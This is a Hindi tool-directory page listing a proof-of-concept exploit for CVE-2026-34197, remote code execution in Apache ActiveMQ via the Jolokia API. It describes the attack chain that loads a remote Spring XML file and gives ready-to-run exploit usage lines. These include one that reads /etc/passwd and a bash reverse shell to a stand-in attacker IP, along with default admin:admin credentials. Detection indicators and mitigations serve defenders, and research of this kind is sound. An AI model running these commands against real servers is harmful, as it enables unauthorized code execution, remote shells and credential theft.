Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-34197 — CVE-2026-34197 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Jolokia API के माध्यम से Apache ActiveMQ में एक RCE है। इसमें एक Python एक्सप्लॉइट, पेलोड टेम्पलेट, और परीक्षण एवं शोध के लिए Docker लैब शामिल है। | Kitploit
उपकरण/GitHubGitHub/devsecurityspro/cve-2026-34197
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंगलैब और अभ्यास
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

CVE-2026-34197 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Jolokia API के माध्यम से Apache ActiveMQ में एक RCE है। इसमें एक Python एक्सप्लॉइट, पेलोड टेम्पलेट, और परीक्षण एवं शोध के लिए Docker लैब शामिल है।

रिपॉजिटरी देखें
44 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-34197 — Apache ActiveMQ RCE Jolokia API के माध्यम से

विवरण

CVE-2026-34197 Apache ActiveMQ Classic में एक रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है जो एक हमलावर को वेब कंसोल में उजागर Jolokia API के माध्यम से सर्वर के ऑपरेटिंग सिस्टम पर मनमाने कमांड निष्पादित करने की अनुमति देती है।

यह भेद्यता 13 वर्षों से अधिक समय से मौजूद है और कई घटकों के बीच परस्पर क्रिया में निहित है: Jolokia (HTTP-JMX ब्रिज), ActiveMQ के MBeans, नेटवर्क कनेक्टर और VM ट्रांसपोर्ट।

भेद्यता जानकारी

फ़ील्डविवरण
CVE IDCVE-2026-34197
प्रकारRCE (रिमोट कोड एक्ज़ीक्यूशन)
CWECWE-20 (गलत इनपुट सत्यापन), CWE-94 (कोड इंजेक्शन)
प्रभावित संस्करणActiveMQ Classic < 5.19.4, 6.0.0 — 6.2.2
पैच किए गए संस्करण5.19.4, 6.2.3
प्रमाणीकरण आवश्यकहाँ (डिफ़ॉल्ट क्रेडेंशियल admin:admin सामान्य हैं)
बिना प्रमाणीकरण6.0.0 — 6.1.1 (CVE-2024-32114 के कारण)
डिफ़ॉल्ट पोर्ट8161 (वेब कंसोल)

शोषण तंत्र

हमले की श्रृंखला इस प्रकार काम करती है:

  1. हमलावर /api/jolokia/ पर एक POST अनुरोध भेजता है जो ब्रोकर के MBean के addNetworkConnector ऑपरेशन को आमंत्रित करता है।
  2. तर्क में vm:// ट्रांसपोर्ट वाला एक URI होता है जो एक गैर-मौजूद ब्रोकर को संदर्भित करता है।
  3. ActiveMQ उस ब्रोकर को तुरंत बनाने का प्रयास करता है और brokerConfig पैरामीटर स्वीकार करता है जो एक दूरस्थ URL की ओर इशारा करता है।
  4. xbean: स्कीम इंगित करती है कि संसाधन एक Spring XML कॉन्फ़िगरेशन फ़ाइल है।
  5. Spring XML में परिभाषित सभी बीन्स को इंस्टैंशिएट करता है, जिसमें वह भी शामिल है जो Runtime.getRuntime().exec() निष्पादित करता है।
  6. सर्वर पर मनमाना कमांड निष्पादित होता है।
root@kitploit:~
हमलावर                          ActiveMQ (पीड़ित)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://ATACANTE/x.xml)  |
   |                                    |
   |                                    |-- VM ब्रोकर बनाता है
   |                                    |-- x.xml डाउनलोड करता है
   |<-- GET /x.xml --------------------|
   |-- XML पेलोड के साथ उत्तर देता है ->|
   |                                    |-- Spring बीन्स इंस्टैंशिएट करता है
   |                                    |-- Runtime.exec(कमांड)
   |                                    |

प्रोजेक्ट संरचना

root@kitploit:~
CVE-2026-34197/
├── README.md              # यह फ़ाइल
├── exploit.py             # मुख्य PoC
├── payloads/
│   └── template.xml       # Spring XML पेलोड टेम्पलेट
├── docker/
│   └── docker-compose.yml # कमजोर प्रयोगशाला वातावरण
└── LICENSE

आवश्यकताएँ

  • Python 3.8+
  • मॉड्यूल: requests, http.server, argparse (stdlib)
  • लक्ष्य के पोर्ट 8161 तक नेटवर्क पहुंच
  • Docker और Docker Compose (वैकल्पिक, प्रयोगशाला के लिए)
root@kitploit:~
pip install requests

उपयोग

1. कमजोर वातावरण शुरू करें (वैकल्पिक)

root@kitploit:~
cd docker
docker-compose up -d

यह localhost:8161 पर एक कमजोर ActiveMQ Classic 5.18.6 शुरू करता है।

2. एक्सप्लॉइट चलाएँ

root@kitploit:~
# डिफ़ॉल्ट क्रेडेंशियल के साथ बुनियादी उपयोग
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "id"

# क्रेडेंशियल निर्दिष्ट करें
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "whoami" -u admin -p admin

# पेलोड HTTP सर्वर का पोर्ट निर्दिष्ट करें
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -lp 9999 -c "cat /etc/passwd"

# बिना प्रमाणीकरण मोड (ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "id" --no-auth

# रिवर्स शेल
python exploit.py -t http://OBJETIVO:8161 -l ATACANTE_IP -c "bash -i >& /dev/tcp/ATACANTE_IP/4444 0>&1"

पैरामीटर

पैरामीटरविवरण
-t, --targetलक्ष्य का आधार URL (उदा: http://10.0.0.1:8161)
-l, --lhostXML पेलोड परोसने के लिए हमलावर का IP
-lp, --lportस्थानीय HTTP सर्वर का पोर्ट (डिफ़ॉल्ट: 8888)
-c, --commandलक्ष्य पर निष्पादित करने के लिए कमांड
-u, --userउपयोगकर्ता (डिफ़ॉल्ट: admin)
-p, --passwordपासवर्ड (डिफ़ॉल्ट: admin)
--no-authक्रेडेंशियल न भेजें (संस्करण 6.0.0 - 6.1.1 के लिए)
--broker-nameब्रोकर का नाम (डिफ़ॉल्ट: localhost)

पहचान

ActiveMQ ब्रोकर लॉग में संकेतक:

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

अन्य संकेतक:

  • बॉडी में addNetworkConnector के साथ /api/jolokia/ पर POST अनुरोध
  • ActiveMQ प्रक्रिया से अप्रत्याशित होस्टों के लिए आउटगोइंग HTTP कनेक्शन
  • ActiveMQ की Java प्रक्रिया द्वारा उत्पन्न अप्रत्याशित चाइल्ड प्रोसेस

निवारण

  • ActiveMQ Classic 5.19.4 या 6.2.3 में अपडेट करें
  • वेब कंसोल के डिफ़ॉल्ट क्रेडेंशियल बदलें
  • पोर्ट 8161 तक नेटवर्क पहुंच प्रतिबंधित करें
  • brokerConfig=xbean:http के साथ vm:// URIs के लिए ब्रोकर लॉग की निगरानी करें

संदर्भ

  • NVD — CVE-2026-34197
  • Horizon3 — तकनीकी विश्लेषण
  • Apache ActiveMQ — सुरक्षा सलाह
  • CVE-2024-32114 — बिना प्रमाणीकरण Jolokia
  • CVE-2023-46604 — OpenWire RCE (CISA KEV)

लेखक

KONDOR DEV SECURITY द्वारा निर्मित

Telegram

कानूनी अस्वीकरण

यह PoC केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध इस टूल का उपयोग अवैध है। लेखक इस टूल के दुरुपयोग के लिए ज़िम्मेदार नहीं है।

लाइसेंस

MIT — कॉपीराइट (c) 2026 KONDOR DEV SECURITY

टूल डाउनलोड करें